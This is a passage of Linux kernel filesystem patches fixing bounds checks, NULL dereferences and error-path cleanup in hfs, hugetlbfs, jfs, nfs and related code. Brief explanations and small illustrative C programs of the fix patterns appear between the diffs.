+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -4188,6 +4188,9 @@ try_onemore:
+ 	if (err)
+ 		goto free_bio_info;
+ 
++	spin_lock_init(&sbi->error_lock);
++	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
++
+ 	init_f2fs_rwsem(&sbi->cp_rwsem);
+ 	init_f2fs_rwsem(&sbi->quota_sem);
+ 	init_waitqueue_head(&sbi->cp_wait);
+@@ -4255,9 +4258,6 @@ try_onemore:
+ 		goto free_devices;
+ 	}
+ 
+-	spin_lock_init(&sbi->error_lock);
+-	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
+-
+ 	sbi->total_valid_node_count =
+ 				le32_to_cpu(sbi->ckpt->valid_node_count);
+ 	percpu_counter_set(&sbi->total_valid_inode_count,
+@@ -4523,9 +4523,9 @@ free_nm:
+ 	f2fs_destroy_node_manager(sbi);
+ free_sm:
+ 	f2fs_destroy_segment_manager(sbi);
+-	f2fs_destroy_post_read_wq(sbi);
+ stop_ckpt_thread:
+ 	f2fs_stop_ckpt_thread(sbi);
++	f2fs_destroy_post_read_wq(sbi);
+ free_devices:
+ 	destroy_device_list(sbi);
+ 	kvfree(sbi->ckpt);
+diff --git a/fs/gfs2/glock.c b/fs/gfs2/glock.c
+index df335c258eb08..235a0948f6cc6 100644
+--- a/fs/gfs2/glock.c
++++ b/fs/gfs2/glock.c
+@@ -1039,6 +1039,7 @@ static void delete_work_func(struct work_struct *work)
+ 			if (gfs2_queue_delete_work(gl, 5 * HZ))
+ 				return;
+ 		}
++		goto out;
+ 	}
+ 
+ 	inode = gfs2_lookup_by_inum(sdp, no_addr, gl->gl_no_formal_ino,
+@@ -1051,6 +1052,7 @@ static void delete_work_func(struct work_struct *work)
+ 		d_prune_aliases(inode);
+ 		iput(inode);
+ 	}
++out:
+ 	gfs2_glock_put(gl);
+ }
+ 
+diff --git a/fs/hfs/inode.c b/fs/hfs/inode.c
+index c4526f16355d5..a0746be3c1de7 100644
+--- a/fs/hfs/inode.c
++++ b/fs/hfs/inode.c
+@@ -458,6 +458,8 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		/* panic? */
+ 		return -EIO;
+ 
++	if (HFS_I(main_inode)->cat_key.CName.len > HFS_NAMELEN)
++		return -EIO;
+ 	fd.search_key->cat = HFS_I(main_inode)->cat_key;
+ 	if (hfs_brec_find(&fd))
+ 		/* panic? */
+diff --git a/fs/hfs/trans.c b/fs/hfs/trans.c
+index 39f5e343bf4d4..fdb0edb8a607d 100644
+--- a/fs/hfs/trans.c
++++ b/fs/hfs/trans.c
+@@ -109,7 +109,7 @@ void hfs_asc2mac(struct super_block *sb, struct hfs_name *out, const struct qstr
+ 	if (nls_io) {
+ 		wchar_t ch;
+ 
+-		while (srclen > 0) {
++		while (srclen > 0 && dstlen > 0) {
+ 			size = nls_io->char2uni(src, srclen, &ch);
+ 			if (size < 0) {
+ 				ch = '?';
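
The old loop advanced only on source bytes, so a long input kept converting past the end of the fixed-size Mac name; also testing dstlen stops at whichever side runs out first. The dual-bound shape, reduced to a byte copy:

	#include <stddef.h>
	#include <stdio.h>

	/* Conversion loop bounded by BOTH sides, as in the fix; the byte
	 * copy stands in for the nls char2uni()/uni2char() steps. */
	static size_t convert(char *dst, size_t dstlen,
			      const char *src, size_t srclen)
	{
		size_t out = 0;

		while (srclen > 0 && dstlen > 0) {  /* was: srclen > 0 only */
			dst[out++] = *src++;
			srclen--;
			dstlen--;
		}
		return out;
	}

	int main(void)
	{
		char mac_name[31];      /* HFS_NAMELEN-sized destination */
		size_t n = convert(mac_name, sizeof(mac_name),
				   "a-very-long-source-name-that-will-not-fit-here",
				   46);

		printf("copied %zu bytes\n", n);    /* 31, not 46 */
		return 0;
	}
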
+diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
+index df7772335dc0e..8eea709e36599 100644
+--- a/fs/hugetlbfs/inode.c
++++ b/fs/hugetlbfs/inode.c
+@@ -1377,7 +1377,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_size:
+ 		/* memparse() will accept a K/M/G without a digit */
+-		if (!isdigit(param->string[0]))
++		if (!param->string || !isdigit(param->string[0]))
+ 			goto bad_val;
+ 		ctx->max_size_opt = memparse(param->string, &rest);
+ 		ctx->max_val_type = SIZE_STD;
+@@ -1387,7 +1387,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_nr_inodes:
+ 		/* memparse() will accept a K/M/G without a digit */
+-		if (!isdigit(param->string[0]))
++		if (!param->string || !isdigit(param->string[0]))
+ 			goto bad_val;
+ 		ctx->nr_inodes = memparse(param->string, &rest);
+ 		return 0;
+@@ -1403,7 +1403,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_min_size:
+ 		/* memparse() will accept a K/M/G without a digit */
+-		if (!isdigit(param->string[0]))
++		if (!param->string || !isdigit(param->string[0]))
+ 			goto bad_val;
+ 		ctx->min_size_opt = memparse(param->string, &rest);
+ 		ctx->min_val_type = SIZE_STD;
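
Value-less mount options reach the parser with param->string == NULL, so isdigit(param->string[0]) dereferenced NULL for input like "size" with no value; checking the pointer first turns that into an ordinary bad-value error. In miniature:

	#include <ctype.h>
	#include <stdio.h>

	/* Reject a missing or non-numeric option value before parsing it;
	 * parse_size_opt() is illustrative, memparse() does the real work. */
	static int parse_size_opt(const char *val)
	{
		if (!val || !isdigit((unsigned char)val[0]))
			return -1;      /* previously: NULL deref when !val */
		return 0;
	}

	int main(void)
	{
		printf("%d %d %d\n",
		       parse_size_opt(NULL),    /* "size" with no value: -1 */
		       parse_size_opt("x4"),    /* non-numeric: -1 */
		       parse_size_opt("64K"));  /* memparse-style value: 0 */
		return 0;
	}
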
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 6b838d3ae7c2e..765838578a722 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -155,7 +155,7 @@ int dbMount(struct inode *ipbmap)
+ 	struct bmap *bmp;
+ 	struct dbmap_disk *dbmp_le;
+ 	struct metapage *mp;
+-	int i;
++	int i, err;
+ 
+ 	/*
+ 	 * allocate/initialize the in-memory bmap descriptor
+@@ -170,8 +170,8 @@ int dbMount(struct inode *ipbmap)
+ 			   BMAPBLKNO << JFS_SBI(ipbmap->i_sb)->l2nbperpage,
+ 			   PSIZE, 0);
+ 	if (mp == NULL) {
+-		kfree(bmp);
+-		return -EIO;
++		err = -EIO;
++		goto err_kfree_bmp;
+ 	}
+ 
+ 	/* copy the on-disk bmap descriptor to its in-memory version. */
+@@ -181,9 +181,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_l2nbperpage = le32_to_cpu(dbmp_le->dn_l2nbperpage);
+ 	bmp->db_numag = le32_to_cpu(dbmp_le->dn_numag);
+ 	if (!bmp->db_numag) {
+-		release_metapage(mp);
+-		kfree(bmp);
+-		return -EINVAL;
++		err = -EINVAL;
++		goto err_release_metapage;
+ 	}
+ 
+ 	bmp->db_maxlevel = le32_to_cpu(dbmp_le->dn_maxlevel);
+@@ -194,6 +193,16 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+ 	bmp->db_agstart = le32_to_cpu(dbmp_le->dn_agstart);
+ 	bmp->db_agl2size = le32_to_cpu(dbmp_le->dn_agl2size);
++	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
++	if (((bmp->db_mapsize - 1) >> bmp->db_agl2size) > MAXAG) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
+ 	for (i = 0; i < MAXAG; i++)
+ 		bmp->db_agfree[i] = le64_to_cpu(dbmp_le->dn_agfree[i]);
+ 	bmp->db_agsize = le64_to_cpu(dbmp_le->dn_agsize);
+@@ -214,6 +223,12 @@ int dbMount(struct inode *ipbmap)
+ 	BMAP_LOCK_INIT(bmp);
+ 
+ 	return (0);
++
++err_release_metapage:
++	release_metapage(mp);
++err_kfree_bmp:
++	kfree(bmp);
++	return err;
+ }
+ 
+ 
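
dbMount() now funnels every failure through ordered labels, each releasing exactly what was acquired before the failing step, which is the usual kernel error-ladder shape. A generic sketch:

	#include <stdlib.h>

	/* Generic error ladder: each failure jumps to a label that unwinds
	 * only what was already acquired, in reverse order. */
	static int mount_thing(void)
	{
		void *bmp, *mp;
		int err;

		bmp = malloc(64);               /* first acquisition */
		if (!bmp)
			return -12;             /* -ENOMEM */

		mp = malloc(64);                /* second acquisition */
		if (!mp) {
			err = -5;               /* -EIO */
			goto err_kfree_bmp;
		}

		if (0 /* an on-disk field fails validation */) {
			err = -22;              /* -EINVAL */
			goto err_release_mp;
		}

		return 0;                       /* success: both stay live */

	err_release_mp:
		free(mp);
	err_kfree_bmp:
		free(bmp);
		return err;
	}

	int main(void)
	{
		return mount_thing();
	}
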
+diff --git a/fs/jfs/namei.c b/fs/jfs/namei.c
+index 9db4f5789c0ec..4fbbf88435e69 100644
+--- a/fs/jfs/namei.c
++++ b/fs/jfs/namei.c
+@@ -946,7 +946,7 @@ static int jfs_symlink(struct user_namespace *mnt_userns, struct inode *dip,
+ 	if (ssize <= IDATASIZE) {
+ 		ip->i_op = &jfs_fast_symlink_inode_operations;
+ 
+-		ip->i_link = JFS_IP(ip)->i_inline;
++		ip->i_link = JFS_IP(ip)->i_inline_all;
+ 		memcpy(ip->i_link, name, ssize);
+ 		ip->i_size = ssize - 1;
+ 
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+index 3fa2139a0b309..92b1603b5abeb 100644
+--- a/fs/ksmbd/mgmt/user_session.c
++++ b/fs/ksmbd/mgmt/user_session.c
+@@ -108,15 +108,17 @@ int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+ 	entry->method = method;
+ 	entry->id = ksmbd_ipc_id_alloc();
+ 	if (entry->id < 0)
+-		goto error;
++		goto free_entry;
+ 
+ 	resp = ksmbd_rpc_open(sess, entry->id);
+ 	if (!resp)
+-		goto error;
++		goto free_id;
+ 
+ 	kvfree(resp);
+ 	return entry->id;
+-error:
++free_id:
++	ksmbd_rpc_id_free(entry->id);
++free_entry:
+ 	list_del(&entry->list);
+ 	kfree(entry);
+ 	return -EINVAL;
+diff --git a/fs/libfs.c b/fs/libfs.c
+index 682d56345a1cf..aada4e7c87132 100644
+--- a/fs/libfs.c
++++ b/fs/libfs.c
+@@ -995,8 +995,8 @@ out:
+ EXPORT_SYMBOL_GPL(simple_attr_read);
+ 
+ /* interpret the buffer as a number to call the set function with */
+-ssize_t simple_attr_write(struct file *file, const char __user *buf,
+-			  size_t len, loff_t *ppos)
++static ssize_t simple_attr_write_xsigned(struct file *file, const char __user *buf,
++			  size_t len, loff_t *ppos, bool is_signed)
+ {
+ 	struct simple_attr *attr;
+ 	unsigned long long val;
+@@ -1017,7 +1017,10 @@ ssize_t simple_attr_write(struct file *file, const char __user *buf,
+ 		goto out;
+ 
+ 	attr->set_buf[size] = '\0';
+-	ret = kstrtoull(attr->set_buf, 0, &val);
++	if (is_signed)
++		ret = kstrtoll(attr->set_buf, 0, &val);
++	else
++		ret = kstrtoull(attr->set_buf, 0, &val);
+ 	if (ret)
+ 		goto out;
+ 	ret = attr->set(attr->data, val);
+@@ -1027,8 +1030,21 @@ out:
+ 	mutex_unlock(&attr->mutex);
+ 	return ret;
+ }
++
++ssize_t simple_attr_write(struct file *file, const char __user *buf,
++			  size_t len, loff_t *ppos)
++{
++	return simple_attr_write_xsigned(file, buf, len, ppos, false);
++}
+ EXPORT_SYMBOL_GPL(simple_attr_write);
+ 
++ssize_t simple_attr_write_signed(struct file *file, const char __user *buf,
++			  size_t len, loff_t *ppos)
++{
++	return simple_attr_write_xsigned(file, buf, len, ppos, true);
++}
++EXPORT_SYMBOL_GPL(simple_attr_write_signed);
++
+ /**
+  * generic_fh_to_dentry - generic helper for the fh_to_dentry export operation
+  * @sb:		filesystem to do the file handle conversion on
+diff --git a/fs/lockd/svcsubs.c b/fs/lockd/svcsubs.c
+index e1c4617de7714..3515f17eaf3fb 100644
+--- a/fs/lockd/svcsubs.c
++++ b/fs/lockd/svcsubs.c
+@@ -176,7 +176,7 @@ nlm_delete_file(struct nlm_file *file)
+ 	}
+ }
+ 
+-static int nlm_unlock_files(struct nlm_file *file, fl_owner_t owner)
++static int nlm_unlock_files(struct nlm_file *file, const struct file_lock *fl)
+ {
+ 	struct file_lock lock;
+ 
+@@ -184,12 +184,15 @@ static int nlm_unlock_files(struct nlm_file *file, fl_owner_t owner)
+ 	lock.fl_type  = F_UNLCK;
+ 	lock.fl_start = 0;
+ 	lock.fl_end   = OFFSET_MAX;
+-	lock.fl_owner = owner;
+-	if (file->f_file[O_RDONLY] &&
+-	    vfs_lock_file(file->f_file[O_RDONLY], F_SETLK, &lock, NULL))
++	lock.fl_owner = fl->fl_owner;
++	lock.fl_pid   = fl->fl_pid;
++	lock.fl_flags = FL_POSIX;
++
++	lock.fl_file = file->f_file[O_RDONLY];
++	if (lock.fl_file && vfs_lock_file(lock.fl_file, F_SETLK, &lock, NULL))
+ 		goto out_err;
+-	if (file->f_file[O_WRONLY] &&
+-	    vfs_lock_file(file->f_file[O_WRONLY], F_SETLK, &lock, NULL))
++	lock.fl_file = file->f_file[O_WRONLY];
++	if (lock.fl_file && vfs_lock_file(lock.fl_file, F_SETLK, &lock, NULL))
+ 		goto out_err;
+ 	return 0;
+ out_err:
+@@ -226,7 +229,7 @@ again:
+ 		if (match(lockhost, host)) {
+ 
+ 			spin_unlock(&flctx->flc_lock);
+-			if (nlm_unlock_files(file, fl->fl_owner))
++			if (nlm_unlock_files(file, fl))
+ 				return 1;
+ 			goto again;
+ 		}
+diff --git a/fs/nfs/fs_context.c b/fs/nfs/fs_context.c
+index 09833ec102fca..9bcd53d5c7d46 100644
+--- a/fs/nfs/fs_context.c
++++ b/fs/nfs/fs_context.c
+@@ -684,6 +684,8 @@ static int nfs_fs_context_parse_param(struct fs_context *fc,
+ 			return ret;
+ 		break;
+ 	case Opt_vers:
++		if (!param->string)
++			goto out_invalid_value;
+ 		trace_nfs_mount_assign(param->key, param->string);
+ 		ret = nfs_parse_version_string(fc, param->string);
+ 		if (ret < 0)
+@@ -696,6 +698,8 @@ static int nfs_fs_context_parse_param(struct fs_context *fc,
+ 		break;
+ 
+ 	case Opt_proto:
++		if (!param->string)
++			goto out_invalid_value;
+ 		trace_nfs_mount_assign(param->key, param->string);
+ 		protofamily = AF_INET;
+ 		switch (lookup_constant(nfs_xprt_protocol_tokens, param->string, -1)) {
+@@ -732,6 +736,8 @@ static int nfs_fs_context_parse_param(struct fs_context *fc,
+ 		break;
+ 
+ 	case Opt_mountproto:
++		if (!param->string)
++			goto out_invalid_value;
+ 		trace_nfs_mount_assign(param->key, param->string);
+ 		mountfamily = AF_INET;
+ 		switch (lookup_constant(nfs_xprt_protocol_tokens, param->string, -1)) {
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index 647fc3f547cbe..ae7d4a8c728c2 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -739,12 +739,10 @@ unsigned long nfs_io_size(unsigned long iosize, enum xprt_transports proto)
+ 		iosize = NFS_DEF_FILE_IO_SIZE;
+ 	else if (iosize >= NFS_MAX_FILE_IO_SIZE)
+ 		iosize = NFS_MAX_FILE_IO_SIZE;
+-	else
+-		iosize = iosize & PAGE_MASK;
+ 
+-	if (proto == XPRT_TRANSPORT_UDP)
++	if (proto == XPRT_TRANSPORT_UDP || iosize < PAGE_SIZE)
+ 		return nfs_block_bits(iosize, NULL);
+-	return iosize;
++	return iosize & PAGE_MASK;
+ }
+ 
+ /*
+diff --git a/fs/nfs/namespace.c b/fs/nfs/namespace.c
+index 2f336ace75554..88a23af2bd5c9 100644
+--- a/fs/nfs/namespace.c
++++ b/fs/nfs/namespace.c
+@@ -147,7 +147,7 @@ struct vfsmount *nfs_d_automount(struct path *path)
+ 	struct nfs_fs_context *ctx;
+ 	struct fs_context *fc;
+ 	struct vfsmount *mnt = ERR_PTR(-ENOMEM);
+-	struct nfs_server *server = NFS_SERVER(d_inode(path->dentry));
++	struct nfs_server *server = NFS_SB(path->dentry->d_sb);
+ 	struct nfs_client *client = server->nfs_client;
+ 	int timeout = READ_ONCE(nfs_mountpoint_expiry_timeout);
+ 	int ret;
+diff --git a/fs/nfs/nfs42xdr.c b/fs/nfs/nfs42xdr.c
+index fe1aeb0f048f2..2fd465cab631d 100644
+--- a/fs/nfs/nfs42xdr.c
++++ b/fs/nfs/nfs42xdr.c
+@@ -1142,7 +1142,7 @@ static int decode_read_plus(struct xdr_stream *xdr, struct nfs_pgio_res *res)
+ 	if (!segs)
+ 		return -ENOMEM;
+ 
+-	xdr_set_scratch_buffer(xdr, &scratch_buf, 32);
++	xdr_set_scratch_buffer(xdr, &scratch_buf, sizeof(scratch_buf));
+ 	status = -EIO;
+ 	for (i = 0; i < segments; i++) {
+ 		status = decode_read_plus_segment(xdr, &segs[i]);
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 86ed5c0142c3d..e51044a5f550f 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -122,6 +122,11 @@ nfs4_label_init_security(struct inode *dir, struct dentry *dentry,
+ 	if (nfs_server_capable(dir, NFS_CAP_SECURITY_LABEL) == 0)
+ 		return NULL;
+ 
++	label->lfs = 0;
++	label->pi = 0;
++	label->len = 0;
++	label->label = NULL;
++
+ 	err = security_dentry_init_security(dentry, sattr->ia_mode,
+ 				&dentry->d_name, NULL,
+ 				(void **)&label->label, &label->len);
+@@ -2126,18 +2131,18 @@ static struct nfs4_opendata *nfs4_open_recoverdata_alloc(struct nfs_open_context
+ }
+ 
+ static int nfs4_open_recover_helper(struct nfs4_opendata *opendata,
+-		fmode_t fmode)
++				    fmode_t fmode)
+ {
+ 	struct nfs4_state *newstate;
++	struct nfs_server *server = NFS_SB(opendata->dentry->d_sb);
++	int openflags = opendata->o_arg.open_flags;
+ 	int ret;
+ 
+ 	if (!nfs4_mode_match_open_stateid(opendata->state, fmode))
+ 		return 0;
+-	opendata->o_arg.open_flags = 0;
+ 	opendata->o_arg.fmode = fmode;
+-	opendata->o_arg.share_access = nfs4_map_atomic_open_share(
+-			NFS_SB(opendata->dentry->d_sb),
+-			fmode, 0);
++	opendata->o_arg.share_access =
++		nfs4_map_atomic_open_share(server, fmode, openflags);
+ 	memset(&opendata->o_res, 0, sizeof(opendata->o_res));
+ 	memset(&opendata->c_res, 0, sizeof(opendata->c_res));
+ 	nfs4_init_opendata_res(opendata);
+@@ -2719,10 +2724,15 @@ static int _nfs4_open_expired(struct nfs_open_context *ctx, struct nfs4_state *s
+ 	struct nfs4_opendata *opendata;
+ 	int ret;
+ 
+-	opendata = nfs4_open_recoverdata_alloc(ctx, state,
+-			NFS4_OPEN_CLAIM_FH);
++	opendata = nfs4_open_recoverdata_alloc(ctx, state, NFS4_OPEN_CLAIM_FH);
+ 	if (IS_ERR(opendata))
+ 		return PTR_ERR(opendata);
++	/*
++	 * We're not recovering a delegation, so ask for no delegation.
++	 * Otherwise the recovery thread could deadlock with an outstanding
++	 * delegation return.
++	 */
++	opendata->o_arg.open_flags = O_DIRECT;
+ 	ret = nfs4_open_recover(opendata, state);
+ 	if (ret == -ESTALE)
+ 		d_drop(ctx->dentry);
+@@ -3796,7 +3806,7 @@ nfs4_atomic_open(struct inode *dir, struct nfs_open_context *ctx,
+ 		int open_flags, struct iattr *attr, int *opened)
+ {
+ 	struct nfs4_state *state;
+-	struct nfs4_label l = {0, 0, 0, NULL}, *label = NULL;
++	struct nfs4_label l, *label;
+ 
+ 	label = nfs4_label_init_security(dir, ctx->dentry, attr, &l);
+ 
+@@ -4013,7 +4023,7 @@ static int _nfs4_discover_trunking(struct nfs_server *server,
+ 
+ 	page = alloc_page(GFP_KERNEL);
+ 	if (!page)
+-		return -ENOMEM;
++		goto out_put_cred;
+ 	locations = kmalloc(sizeof(struct nfs4_fs_locations), GFP_KERNEL);
+ 	if (!locations)
+ 		goto out_free;
+@@ -4035,6 +4045,8 @@ out_free_2:
+ 	kfree(locations);
+ out_free:
+ 	__free_page(page);
++out_put_cred:
++	put_cred(cred);
+ 	return status;
+ }
+ 
+@@ -4682,7 +4694,7 @@ nfs4_proc_create(struct inode *dir, struct dentry *dentry, struct iattr *sattr,
+ 		 int flags)
+ {
+ 	struct nfs_server *server = NFS_SERVER(dir);
+-	struct nfs4_label l, *ilabel = NULL;
++	struct nfs4_label l, *ilabel;
+ 	struct nfs_open_context *ctx;
+ 	struct nfs4_state *state;
+ 	int status = 0;
+@@ -5033,7 +5045,7 @@ static int nfs4_proc_symlink(struct inode *dir, struct dentry *dentry,
+ 	struct nfs4_exception exception = {
+ 		.interruptible = true,
+ 	};
+-	struct nfs4_label l, *label = NULL;
++	struct nfs4_label l, *label;
+ 	int err;
+ 
+ 	label = nfs4_label_init_security(dir, dentry, sattr, &l);
+@@ -5074,7 +5086,7 @@ static int nfs4_proc_mkdir(struct inode *dir, struct dentry *dentry,
+ 	struct nfs4_exception exception = {
+ 		.interruptible = true,
+ 	};
+-	struct nfs4_label l, *label = NULL;
++	struct nfs4_label l, *label;
+ 	int err;
+ 
+ 	label = nfs4_label_init_security(dir, dentry, sattr, &l);
+@@ -5193,7 +5205,7 @@ static int nfs4_proc_mknod(struct inode *dir, struct dentry *dentry,
+ 	struct nfs4_exception exception = {
+ 		.interruptible = true,
+ 	};
+-	struct nfs4_label l, *label = NULL;
++	struct nfs4_label l, *label;
+ 	int err;
+ 
+ 	label = nfs4_label_init_security(dir, dentry, sattr, &l);
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index a2d2d5d1b0888..03087ef1c7b4a 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -1230,6 +1230,8 @@ void nfs4_schedule_state_manager(struct nfs_client *clp)
+ 	if (IS_ERR(task)) {
+ 		printk(KERN_ERR "%s: kthread_run: %ld\n",
+ 			__func__, PTR_ERR(task));
++		if (!nfs_client_init_is_complete(clp))
++			nfs_mark_client_ready(clp, PTR_ERR(task));
+ 		nfs4_clear_state_manager_bit(clp);
+ 		clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 		nfs_put_client(clp);
+diff --git a/fs/nfs/nfs4xdr.c b/fs/nfs/nfs4xdr.c
+index acfe5f4bda480..deec76cf5afea 100644
+--- a/fs/nfs/nfs4xdr.c
++++ b/fs/nfs/nfs4xdr.c
+@@ -4234,19 +4234,17 @@ static int decode_attr_security_label(struct xdr_stream *xdr, uint32_t *bitmap,
+ 		p = xdr_inline_decode(xdr, len);
+ 		if (unlikely(!p))
+ 			return -EIO;
++		bitmap[2] &= ~FATTR4_WORD2_SECURITY_LABEL;
+ 		if (len < NFS4_MAXLABELLEN) {
+-			if (label) {
+-				if (label->len) {
+-					if (label->len < len)
+-						return -ERANGE;
+-					memcpy(label->label, p, len);
+-				}
++			if (label && label->len) {
++				if (label->len < len)
++					return -ERANGE;
++				memcpy(label->label, p, len);
+ 				label->len = len;
+ 				label->pi = pi;
+ 				label->lfs = lfs;
+ 				status = NFS_ATTR_FATTR_V4_SECURITY_LABEL;
+ 			}
+-			bitmap[2] &= ~FATTR4_WORD2_SECURITY_LABEL;
+ 		} else
+ 			printk(KERN_WARNING "%s: label too long (%u)!\n",
+ 					__func__, len);
+@@ -4755,12 +4753,10 @@ static int decode_getfattr_attrs(struct xdr_stream *xdr, uint32_t *bitmap,
+ 	if (status < 0)
+ 		goto xdr_error;
+ 
+-	if (fattr->label) {
+-		status = decode_attr_security_label(xdr, bitmap, fattr->label);
+-		if (status < 0)
+-			goto xdr_error;
+-		fattr->valid |= status;
+-	}
++	status = decode_attr_security_label(xdr, bitmap, fattr->label);
++	if (status < 0)
++		goto xdr_error;
++	fattr->valid |= status;
+ 
+ xdr_error:
+ 	dprintk("%s: xdr returned %d\n", __func__, -status);
+diff --git a/fs/nfsd/nfs2acl.c b/fs/nfsd/nfs2acl.c
+index 13e6e6897f6cf..65d4511b7af08 100644
+--- a/fs/nfsd/nfs2acl.c
++++ b/fs/nfsd/nfs2acl.c
+@@ -246,7 +246,6 @@ nfsaclsvc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ 	struct nfsd3_getaclres *resp = rqstp->rq_resp;
+ 	struct dentry *dentry = resp->fh.fh_dentry;
+ 	struct inode *inode;
+-	int w;
+ 
+ 	if (!svcxdr_encode_stat(xdr, resp->status))
+ 		return false;
+@@ -260,15 +259,6 @@ nfsaclsvc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ 	if (xdr_stream_encode_u32(xdr, resp->mask) < 0)
+ 		return false;
+ 
+-	rqstp->rq_res.page_len = w = nfsacl_size(
+-		(resp->mask & NFS_ACL)   ? resp->acl_access  : NULL,
+-		(resp->mask & NFS_DFACL) ? resp->acl_default : NULL);
+-	while (w > 0) {
+-		if (!*(rqstp->rq_next_page++))
+-			return true;
+-		w -= PAGE_SIZE;
+-	}
+-
+ 	if (!nfs_stream_encode_acl(xdr, inode, resp->acl_access,
+ 				   resp->mask & NFS_ACL, 0))
+ 		return false;
+diff --git a/fs/nfsd/nfs3acl.c b/fs/nfsd/nfs3acl.c
+index 2fb9ee3564558..a34a22e272ad5 100644
+--- a/fs/nfsd/nfs3acl.c
++++ b/fs/nfsd/nfs3acl.c
+@@ -171,11 +171,7 @@ nfs3svc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ {
+ 	struct nfsd3_getaclres *resp = rqstp->rq_resp;
+ 	struct dentry *dentry = resp->fh.fh_dentry;
+-	struct kvec *head = rqstp->rq_res.head;
+ 	struct inode *inode;
+-	unsigned int base;
+-	int n;
+-	int w;
+ 
+ 	if (!svcxdr_encode_nfsstat3(xdr, resp->status))
+ 		return false;
+@@ -187,26 +183,12 @@ nfs3svc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ 		if (xdr_stream_encode_u32(xdr, resp->mask) < 0)
+ 			return false;
+ 
+-		base = (char *)xdr->p - (char *)head->iov_base;
+-
+-		rqstp->rq_res.page_len = w = nfsacl_size(
+-			(resp->mask & NFS_ACL)   ? resp->acl_access  : NULL,
+-			(resp->mask & NFS_DFACL) ? resp->acl_default : NULL);
+-		while (w > 0) {
+-			if (!*(rqstp->rq_next_page++))
+-				return false;
+-			w -= PAGE_SIZE;
+-		}
+-
+-		n = nfsacl_encode(&rqstp->rq_res, base, inode,
+-				  resp->acl_access,
+-				  resp->mask & NFS_ACL, 0);
+-		if (n > 0)
+-			n = nfsacl_encode(&rqstp->rq_res, base + n, inode,
+-					  resp->acl_default,
+-					  resp->mask & NFS_DFACL,
+-					  NFS_ACL_DEFAULT);
+-		if (n <= 0)
++		if (!nfs_stream_encode_acl(xdr, inode, resp->acl_access,
++					   resp->mask & NFS_ACL, 0))
++			return false;
++		if (!nfs_stream_encode_acl(xdr, inode, resp->acl_default,
++					   resp->mask & NFS_DFACL,
++					   NFS_ACL_DEFAULT))
+ 			return false;
+ 		break;
+ 	default:
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index f0e69edf5f0f1..6253cbe5f81b4 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -916,7 +916,6 @@ static int setup_callback_client(struct nfs4_client *clp, struct nfs4_cb_conn *c
+ 	} else {
+ 		if (!conn->cb_xprt)
+ 			return -EINVAL;
+-		clp->cl_cb_conn.cb_xprt = conn->cb_xprt;
+ 		clp->cl_cb_session = ses;
+ 		args.bc_xprt = conn->cb_xprt;
+ 		args.prognumber = clp->cl_cb_session->se_cb_prog;
+@@ -936,6 +935,9 @@ static int setup_callback_client(struct nfs4_client *clp, struct nfs4_cb_conn *c
+ 		rpc_shutdown_client(client);
+ 		return -ENOMEM;
+ 	}
++
++	if (clp->cl_minorversion != 0)
++		clp->cl_cb_conn.cb_xprt = conn->cb_xprt;
+ 	clp->cl_cb_client = client;
+ 	clp->cl_cb_cred = cred;
+ 	rcu_read_lock();
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 8beb2bc4c328f..32fe7cbfb28b3 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1133,6 +1133,8 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 				0, (time64_t)0);
+ 	if (!status)
+ 		status = nfserrno(attrs.na_labelerr);
++	if (!status)
++		status = nfserrno(attrs.na_aclerr);
+ out:
+ 	nfsd_attrs_free(&attrs);
+ 	fh_drop_write(&cstate->current_fh);
+@@ -1644,6 +1646,7 @@ static ssize_t _nfsd_copy_file_range(struct nfsd4_copy *copy,
+ 	u64 src_pos = copy->cp_src_pos;
+ 	u64 dst_pos = copy->cp_dst_pos;
+ 	int status;
++	loff_t end;
+ 
+ 	/* See RFC 7862 p.67: */
+ 	if (bytes_total == 0)
+@@ -1663,8 +1666,8 @@ static ssize_t _nfsd_copy_file_range(struct nfsd4_copy *copy,
+ 	/* for a non-zero asynchronous copy do a commit of data */
+ 	if (nfsd4_copy_is_async(copy) && copy->cp_res.wr_bytes_written > 0) {
